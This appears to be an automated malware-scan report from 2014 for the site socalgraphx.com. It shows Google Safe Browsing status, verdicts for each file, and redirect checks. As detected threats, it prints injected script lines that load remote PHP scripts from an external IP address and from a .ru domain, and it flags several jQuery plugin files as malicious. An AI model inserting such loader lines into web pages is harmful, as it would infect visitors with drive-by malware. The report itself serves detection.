Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=socalgraphx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://socalgraphx.com/ | 200 OK Content-Length: 14580 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://86.120.30.122/sugarcrm/fizmsLX3.php?id=47124590" type="text/javascript"></script> | ||
http://socalgraphx.com/assets/javascripts/jquery-1.6.2.min.js | 200 OK Content-Length: 100771 Content-Type: application/javascript | clean |
http://socalgraphx.com/assets/javascripts/tabs.js | 200 OK Content-Length: 10194 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { var tabs = $('ul.tabs'); tabs.each(function(i) { var tab = $(this).find('> li > a'); tab.click(function(e) { var contentLocation = $(this).attr('href'); if(contentLocation.charAt(0)=="#") { e.preventDefault(); tab.removeClass('active'); $(this).addClass('active'); $(contentLocation).show().addClass('active').siblings().hide().removeClass('active'); } }); Antivirus reports:
| ||
http://socalgraphx.com/assets/javascripts/jquery.tipsy.js | 200 OK Content-Length: 13587 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.tipsy = function(options) { options = $.extend({}, $.fn.tipsy.defaults, options); return this.each(function() { var opts = $.fn.tipsy.elementOptions(this, options); $(this).hover(function() { $.data(this, 'cancel.tipsy', true); var tip = $.data(this, 'active.tipsy'); if (!tip) { tip = Antivirus reports:
| ||
http://socalgraphx.com/assets/javascripts/jquery.prettyPhoto.js | 200 OK Content-Length: 40533 Content-Type: application/javascript | clean |
http://socalgraphx.com/assets/javascripts/jquery.hoverIntent.js | 200 OK Content-Length: 13463 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.hoverIntent = function(f,g) { var cfg = { sensitivity: 7, interval: 100, timeout: 0 }; cfg = $.extend(cfg, g ? { over: f, out: g } : f ); var cX, cY, pX, pY; var track = function(ev) { cX = ev.pageX; cY = ev.pageY; }; var compare = function(ev,ob) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); if ( ( Math.abs(pX-cX) Math.abs(pY-cY) ) < cfg.sensitivity ) Antivirus reports:
| ||
http://socalgraphx.com/assets/javascripts/superfish.js | 200 OK Content-Length: 12930 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men Antivirus reports:
| ||
http://socalgraphx.com/assets/javascripts/supersubs.js | 200 OK Content-Length: 12649 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://rezzina.ru/k7jm6wtz.php?id=47124600"></script>'); | ||
http://socalgraphx.com/assets/javascripts/chosen/chosen.jquery.js | 200 OK Content-Length: 30302 Content-Type: application/javascript | clean |
http://socalgraphx.com/assets/javascripts/jquery.flexslider-min.js | 200 OK Content-Length: 14516 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){a.fn.extend({flexslider:function(q){var k={animation:"fade",slideshow:true,slideshowSpeed:7000,animationDuration:500,directionNav:true,controlNav:true,keyboardNav:true,touchSwipe:true,prevText:"Previous",nextText:"Next",randomize:false,slideToStart:0,pauseOnAction:true,pauseOnHover:false,controlsContainer:"",manualControls:""};var q=a.extend(k,q),d=this,c=a(".slides",d),b=a(".slides li",d),f=b.length;ANIMATING=false,currentSlide=q.slideToStart;if(q.randomize&&f>1){b.sort( Antivirus reports:
| ||
http://socalgraphx.com/assets/javascripts/filterable.pack.js | 200 OK Content-Length: 10913 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.filterable=function(settings){settings=$.extend({useHash:false,animationSpeed:100,show:{opacity:'show'},hide:{opacity:'hide'},useTags:true,tagSelector:'#portfolio-filter a',selectedTagClass:'current',allTag:'all'},settings);return $(this).each(function(){$(this).bind("filter",function(e,tagToShow){if(settings.useTags){$(settings.tagSelector).removeClass(settings.selectedTagClass);$(settings.tagSelector '[href=' tagToShow ']').addClass(settings.selectedTagClass)}$(this).trigger( Antivirus reports:
| ||
http://socalgraphx.com/assets/javascripts/skeleton-key.js | 200 OK Content-Length: 22415 Content-Type: application/javascript | clean |
http://socalgraphx.com/index.html | 200 OK Content-Length: 14580 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://86.120.30.122/sugarcrm/fizmsLX3.php?id=47124590" type="text/javascript"></script> | ||
http://socalgraphx.com/about.html | 500 Internal Server Error Content-Length: 573 Content-Type: text/html | clean |
http://socalgraphx.com/test404page.js | 404 Not Found Content-Length: 419 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: socalgraphx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 17 Sep 2014 02:12:28 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 14580
Content-Type: text/html
...14580 bytes of data.
GET / HTTP/1.1
Host: socalgraphx.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 17 Sep 2014 02:12:28 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 14580
Content-Type: text/html
...14580 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: socalgraphx.com
Referer: http://www.google.com/search?q=socalgraphx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: socalgraphx.com
Referer: http://www.google.com/search?q=socalgraphx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.